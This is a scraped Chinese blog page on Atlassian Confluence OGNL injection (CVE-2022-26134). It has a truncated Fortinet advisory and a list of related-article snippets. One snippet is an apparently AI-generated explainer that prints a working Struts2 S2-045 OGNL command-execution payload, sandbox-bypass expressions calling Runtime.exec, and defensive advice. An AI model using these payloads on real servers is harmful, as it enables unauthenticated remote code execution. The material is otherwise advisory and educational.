高危漏洞预警 | Atlassian Confluence OGNL注入命令执行漏洞复现与分析报告

原创 已于 2022-06-30 18:45:17 修改 · 2k 阅读 · 2 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全 #web安全

于 2022-06-16 18:48:36 首次发布

通告信息

近日,Volexity(volexity.com,以下简称为:Volexity)在对从Confluence Server系统收集到的数据进行彻底审查后,发现了攻击者启动Exp以实现远程代码执行,随后Volexity重新创建了该漏洞的利用并在最新版本的Confluence Server上进行了复现,于 2022 年 5 月 31 日联系 Atlassian 报告相关细节。Atlassian 已确认该漏洞,并上报给CVE,确认漏洞编号为“ CVE-2022-26134。它已被确认适用于当前版本的 Confluence Server 和 Data Center。

此漏洞同之前爆出的相关漏洞极度相似,同样也被利用以获得远程代码的执行,

所以对其判断为“高危”漏洞,漏洞威胁等级(严重),CVSS评分10.0。

攻击者需要向Confluence Server发送Web请求,就可以在没有服务器相关凭证的情况下,完全对服务器进行控制。

Fortinet 中国安全团队针对此次漏洞信息,进行即时响应并成功验证。漏洞威胁等级(严重)。对此,Fortinet建议广大用户及时进行预防工作,升级到安全版本,并做好资产自查,同时,对已经购买Fortinet产品的用户,建议升级到最新的特征库版本,用于防护此漏洞的相关攻击请求。

漏洞编号

CVE-2022-26134

影响

未授权状态下执行远程代码

严重性级别

严重

受影响的平台

所有受支持版本的Confluence Server and Data Center

Confluence Server and Data Center 1.3.0 之后的版本

受影响的版本

Atlassian Confluence Server and Data Center &l
最低0.47元/天 解锁文章
Fortinet_CHINA
关注
漏洞复现Atlassian Confluence(CVE-2022-26134)OGNL远程代码执行
李同學的安全圈
06-06 2586
本篇文章所涉及技术工具仅用于技术研究、漏洞复现,切勿用于非法渗透攻击行为,造成任何后果本作者无关,切记!!!Atlassian Confluence 是一款各企业广泛使用的 wiki 系统。在上存在OGNL 注入漏洞,恶意攻击者可以利用该漏洞在目标Atlassian Confluence Server and Data Center服务器上注入恶意ONGL表达式 ,造成远程代码执行。......
Atlassian Confluence 远程代码执行漏洞复现(CVE-2021-26084)
0xSec
01-17 1838
Atlassian ConfluenceAtlassian公司出品的专业wiki程序。它可以作为一个知识管理的工具,通过它能够实现团队成员之间的协作和知识共享。
漏洞复现Atlassian Confluence RCE(CVE-2023-22527)
zkaqlaoniao的博客
06-26 832
Atlassian Confluence 是一款由Atlassian开发的企业团队协作和知识管理软件,提供了一个集中化的平台,用于创建、组织和共享团队的文档、知识库、项目计划和协作内容。是面向大型企业和组织的高可用性、可扩展性和高性能版本。Atlassian Confluence /template/aui/text-inline.vm接口处存在velocity模板注入,未经身份验证的攻击者可利用此漏洞构造恶意请求远程代码执行,可导致服务器失陷。
2024hw蓝队面试题--5
aihua002的博客
06-17 716
我了解的中间件有很多种,其中包括但不限于:Nginx、Apache、Tomcat、Redis、RabbitMQ、Kafka、Zookeeper等。常见漏洞有:未授权的访问、代码执行漏洞、配置错误、解析错误漏洞漏洞远程代码执行漏洞:如S2-045,在该漏洞中,当开发者使用基于Jakarta插件上传文件时,攻击者可以通过特殊构造的Content-Type头以激活Struts2的远程代码执行路径。特征就是Content-Type中有OGNL表达式的存在OGNL表达式注入攻击者可以通过构造特定数据带入OGNL
Atlassian Confluence OGNL表达式注入命令执行漏洞(CVE-2021-26084)漏洞复现
m0_64366018的博客
01-16 972
Confluence Data Center上存在一个注入漏洞漏洞编号为CVE-2021-26084。该漏洞允许经过身份验证或在某些情况下未授权的攻击者,在Confluence Server或Confluence Data Center上执行任意代码。
ATLASSIAN CONFLUENCE 远程代码执行漏洞(CVE-2022-26134)漏洞复现
Websec
06-07 1497
近日,Atlassian官方发布了Confluence Server和Data Center OGNL 注入漏洞(CVE-2022-26134)的安全公告,远程攻击者在未经身份验证的情况下,可构造OGNL表达式进行注入,实现在Confluence Server或Data Center上执行任意代码,CVSS评分为10。目前该漏洞细节PoC已被公开披露,且被检测到存在在野利用。请相关用户尽快采取措施进行防护。Atlassian ConfluenceAtlassian公司出品的专业wiki程序。它可以作为一
Atlassian Confluence OGNL表达式注入代码执行漏洞(CVE-2021-26084)
wangqiao258的博客
10-13 4030
环境搭建: 使用vulhub,进入文件夹启动环境: docker-compose up -d 环境启动后,访问http://your-ip:8090即可进入安装向导,参考CVE-2019-3396这个环境中的安装方法,申请试用版许可证。在填写数据库信息的页面,PostgreSQL数据库地址为db,数据库名称confluence,用户名密码均为postgres。 漏洞复现: POST /pages/createpage-entervariables.action HTTP/1.1 Host: 192.168
Confluence OGNL表达式注入漏洞复现分析(CVE-2022-26134)
Brucetg的博客
06-06 5108
在受影响的 Confluence Server 和 Data Center 版本中,存在一个 OGNL 注入漏洞,该漏洞允许未经身份验证的攻击者在 Confluence Server 或 Data Center 实例上执行任意代码。
【风险预警Confluence Wiki OGNL注入漏洞(CVE-2022-26134)
murphysec的博客
06-04 4730
6月4日,墨菲安全实验室监测发现Atlassian修复了Confluence Server 和 Confluence Data Center 中的OGNL注入漏洞Atlassian Confluence是企业常用的wiki系统,攻击者无需认证可利用漏洞Confluence Server 或 Confluence Data Center 系统中执行任意代码。CVSS评分为9.8分,评级为严重,按照官方描述该漏洞受影响版本为:所有受支持的 Confluence Server 和 Confluence Dat
【成功复现Atlassian Confluence 远程代码执行漏洞(CVE-2023-22527)
wuli1024的博客
01-25 1732
Atlassian Confluence是澳大利亚Atlassian公司的一套专业的企业知识管理协同软件,也可以用于构建企业WiKi。
漏洞预警Atlassian 修复了Confluence的0DAY漏洞OGNL注入漏洞 CVE-2022-26134):无需要身份验证的远程代码执行漏洞
信息安全-企业安全-数据安全
06-05 871
知名软件厂商Atlassian发布了安全更新,用于修复Confluence 和 数据中心的一个关键的0Day漏洞,此漏洞正在被黑客疯狂的攻击暴露在互联网的服务器。
【vulhub】Atlassian Confluence 路径穿越命令执行漏洞(CVE-2019-3396)复现反思!
qq_45300786的博客
09-14 684
搭建confluence看这3篇教程,该cve搭建是用Confluence Server, 但是tm就是没有Confluence Server https://www.icode9.com/content-4-915235.html https://blog.youkuaiyun.com/weixin_30813225/article/details/99669339 https://www.cnblogs.com/huangxiaosan/p/14290034.html 我这里直接提供key AAABQw0ODAo
Atlassian Confluence 路径穿越命令执行漏洞(CVE-2019-3396)莫得复现
EC_Carrot的博客
05-21 584
漏洞简介 Atlassian Confluence是企业广泛使用的wiki系统,其6.14.2版本前存在一处未授权的目录穿越漏洞,通过该漏洞攻击者可以读取任意文件,或利用Velocity模板注入执行任意命令。 影响版本 Atlassian Confluence Server 6.6.12之前版本,6.7.0版本至6.12.3之前版本,6.13.0版本至6.13.3之前版本,6.14.0版本至6.14.2之前版本。 漏洞复现 我的环境为vulhub的靶机,难受的是按照它的流程去安装服务时,发现官网似乎将
大华DSS S2-045 OGNL表达式注入漏洞复现
0xSec
12-08 1572
大华DSS安防监控系统平台采用ApacheStruts2作为网站应用框架。由于应用程序框架存在远程命令执行漏洞攻击者可以通过在上传文件时修改HTTP请求标头中的Content Type值来触发该漏洞,然后执行该漏洞。系统命令以获取服务器权限。
Confluence OGNL 注入漏洞
hhhhhh559的博客
06-10 525
Confluence
『Java安全』Struts2 2.0.8 OGNL注入漏洞S2-001复现浅析
Ho1aAs‘s Blog
07-29 1548
学习一下S2漏洞的利用Struts2使用opensymphony.xwork2.0.3组件解析OGNL,该组件导致OGNL注入漏洞,发送表单时内容会引发OGNL注入
详述近期遭利用的 Atlassian Confluence OGNL 注入漏洞 (CVE-2021-26084)
smellycat000的专栏
10-14 2634
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士趋势科技公司的研究团队详述了CVE-2021-26084 的根因。Atlassian Confluence Server and Dat...
struts2 057 OGNL的远程代码执行漏洞复现
weixin_45291045的博客
02-13 660
访问:http://www.xxx.cn:81/struts2-showcase 漏洞验证 访问 /struts2-showcase/${(111+111)}/actionChain1.action 回车 变成了/struts2-showcase/222/register2.action 111+111执行了证明存在struts2-057漏洞 命令执行poc /index/%24%7B%28%23dm%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS%29.%28
Java表达式注入OGNL 表达式注入
GalaxySpaceX的博客
08-23 3289
Java表达式注入OGNL 表达式注入
OGNL 注入漏洞触发路径
最新发布
03-27
<think>嗯,用户之前问过文件上传漏洞的触发路径,现在又转向了OGNL注入漏洞。这说明用户可能正在学习或研究各种Web安全漏洞,需要详细了解不同类型的攻击方式。用户可能是安全研究人员、开发者,或者学生,希望深入理解漏洞原理以便防御。 首先,我需要回顾OGNL注入的基本概念。OGNL是Object-Graph Navigation Language,主要用于Java框架如Struts中处理表达式。注入漏洞通常发生在框架未正确过滤用户输入,导致攻击者能够执行任意代码。 接下来,思考用户的需求。他们可能已经知道文件上传漏洞的触发路径,现在想了解另一个漏洞类型。需要将OGNL注入的触发路径结构化,分点说明,类似于之前的回答,保持一致性。同时,要确保技术细节准确,比如具体的攻击示例和触发条件。 用户可能想知道漏洞是如何被触发的,包括哪些框架或场景容易受影响,攻击者如何利用输入点,以及具体的利用方式。需要覆盖常见的触发路径,如参数注入、标签属性注入、二次解析等,并举例说明,比如Struts2的历史漏洞。 另外,用户可能对防御措施感兴趣,所以在回答的最后要给出防御建议,帮助他们在实际开发中避免此类漏洞。需要强调输入过滤、沙箱机制、框架升级和权限最小化等关键点。 还要注意回答的结构清晰,分点列出,使用标题和子标题,方便用户阅读。同时,确保使用中文,避免专业术语过于晦涩,必要时进行解释,比如解释OGNL是什么,以及它在哪些框架中被使用。 最后,检查是否有遗漏的重要信息,确保覆盖所有常见的触发路径和示例,比如提到CVE编号,增强回答的可信度。同时,确保技术细节正确,比如提到Struts2的漏洞实例,如S2-045、S2-061,以及攻击payload的构造方式。 总结来说,回答需要结构清晰,技术准确,示例具体,并包含防御措施,满足用户从理解到应用的需求。</think>OGNL(Object-Graph Navigation Language)注入漏洞是一种因表达式解析不当导致的安全问题,常见于基于Java的Web框架(如Struts2)。其核心触发路径是**攻击者通过控制用户输入,构造恶意OGNL表达式,最终在服务端执行任意代码**。以下是典型的触发路径及技术细节: --- ### **1. 用户输入直接拼接OGNL表达式** - **触发条件**:框架将用户输入未经过滤直接拼接到OGNL表达式中解析。 - **攻击示例**: - 攻击者通过HTTP参数注入OGNL表达式。例如,在Struts2的某些漏洞中(如S2-045),通过`Content-Type`头传入恶意表达式: ```http Content-Type: %{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='id').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))} ``` - 服务端解析该表达式后,执行系统命令(如`id`)并返回结果。 --- ### **2. 动态调用方法时参数可控** - **触发条件**:框架允许通过参数动态调用对象方法,但未对方法名或参数进行过滤。 - **攻击示例**: - 在Struts2的`ParametersInterceptor`中,若配置`acceptParamNames`过于宽松,攻击者可传入类似`(#application).get('key')`的表达式,直接操作ServletContext等对象。 --- ### **3. 标签属性值解析漏洞** - **触发条件**:UI标签(如JSP标签)的属性值被解析为OGNL表达式。 - **攻击示例**: - 在Struts2的某些版本中(如S2-061),攻击者通过控制标签属性触发表达式解析: ```jsp <s:textfield name="%{(#_memberAccess['allowStaticMethodAccess']=true, @java.lang.Runtime@getRuntime().exec('calc'))}"/> ``` - 服务端解析标签时执行表达式,启动计算器程序(`calc`)。 --- ### **4. 二次解析漏洞** - **触发条件**:用户输入在多层解析过程中被错误地二次解析为OGNL表达式。 - **攻击示例**: - 攻击者传入经过URL编码的表达式(如`%25{...}`),框架第一次解码得到`%{...}`,第二次解析时将其作为OGNL表达式执行。 --- ### **5. 默认沙箱绕过** - **触发条件**:框架的OGNL沙箱防护被绕过(如通过反射修改访问权限)。 - **攻击示例**: - 利用OGNL的上下文特性,通过`#_memberAccess`变量关闭安全限制: ```ognl #_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS, @java.lang.Runtime@getRuntime().exec('命令') ``` --- ### **漏洞防御建议** 1. **输入过滤转义**: - 对用户输入的`%{...}`、`$`等特殊符号进行转义或拦截。 2. **启用OGNL沙箱**: - 限制表达式可访问的类和方法(如Struts2的`struts.ognl.allowStaticMethodAccess`设为`false`)。 3. **升级框架版本**: - 及时修复已知漏洞(如Struts2的S2-045、S2-061等CVE)。 4. **最小化权限运行**: - 使用低权限用户运行应用服务,减少命令执行的影响范围。 --- **总结**:OGNL注入漏洞的核心触发路径是**攻击者通过可控输入点注入恶意表达式**,利用框架解析机制执行任意代码。其危害包括远程命令执行、数据泄露等,需结合框架特性安全配置进行防御。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值